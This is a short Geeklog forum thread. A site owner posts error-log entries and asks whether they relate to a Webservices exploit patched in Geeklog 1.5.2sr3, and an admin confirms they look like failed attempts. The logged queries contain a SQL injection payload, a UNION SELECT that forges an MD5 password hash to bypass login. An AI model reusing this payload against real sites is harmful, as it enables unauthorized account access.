Welcome to Geeklog, Anonymous Sunday, December 22 2024 @ 07:31 pm EST

Geeklog Forums

Webservices exploit


Status: offline

LWC

Forum User
Full Member
Registered: 02/19/04
Posts: 818
Could Webservices exploit, that was fixed in Geeklog 1.5.2sr3, be related to this error.log errors I got in one of my sites in April:

Text Formatted Code
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND ((remoteservice is null) or (remoteservice = ''))' at line 1. SQL in question: SELECT status, passwd, email, uid FROM gl_users WHERE username=''' AND ((remoteservice is null) or (remoteservice = ''))

(and at the same second)
Text Formatted Code
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' AND ((remoteservice is null) or (remoteservice = ''))' at line 1. SQL in question: SELECT status, passwd, email, uid FROM gl_users WHERE username='' AND 0 UNION SELECT 3,MD5('AAAA'),null,2 FROM gl_users LIMIT 1/*' AND ((remoteservice is null) or (remoteservice = ''))

?
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Yep, those look like (failed) attempts to exploit it.

bye, Dirk
 Quote

All times are EST. The time is now 07:31 pm.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content